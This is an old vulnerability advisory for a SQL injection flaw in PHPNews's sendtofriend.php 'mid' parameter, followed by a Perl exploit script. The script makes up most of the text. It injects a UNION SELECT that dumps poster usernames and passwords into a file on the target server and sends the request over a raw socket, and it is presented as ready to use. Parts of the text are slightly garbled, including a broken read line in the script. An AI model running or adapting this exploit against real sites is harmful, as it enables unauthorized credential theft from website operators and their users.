SQL Injection vulnerability in PHPNews 11/25/2004 Description: A vulnerability has been reported in PHPNews, which can be exploited by malicious people to conduct SQL injection attacks Input passed to the "mid" parameter in "sendtofriendphp" is not properly sanitised before being used in a SQL query This can be exploited to manipulate SQL queries by injecting arbitrary SQL code The vulnerability has been reported in version 123 Other versions may also be affected Provided and/or discovered by: Reported by vendor http://secunia.com/advisories/13300/ simple exploit-test written by ruggine ruggine@autistici.org n.b. Use at your own risk! :P --------------------------------- snip here #!/usr/bin/perl -w use Socket; unless (@ARGV > 2) { die "usage: $0 mid_number /path_to_phpnews/ ip_host\n". "f.e. phpnews 1 /phpnews/ 192.168.0.1\n"}; my $mid_number = $ARGV[0]; my $path_to_phpnews = $ARGV[1]; my $host = $ARGV[2]; my $port = 80; my $EOL = "\015\012"; my $inj = "%20union%20select%20username,password%20from%20phpnews_posters%20into%20outfile%20'/tmp/ghghgh'"; my $packet = "GET " . $path_to_phpnews . "sendtofriend.php?mid=" . $mid_number . $inj . " HTTP/1.0" . $EOL. $EOL; my $protocol = getprotobyname('tcp'); my $iaddr = inet_aton($host); my $paddr = sockaddr_in($port,$iaddr); socket(SOCKET,PF_INET,SOCK_STREAM,$protocol) or die "no socket :-("; connect(SOCKET,$paddr) or die "no connect :-("; send(SOCKET,$packet,0) or die "no send :-("; @lines = ; print @lines; close SOCKET or die "no close :-("; -------------------------------------------end snip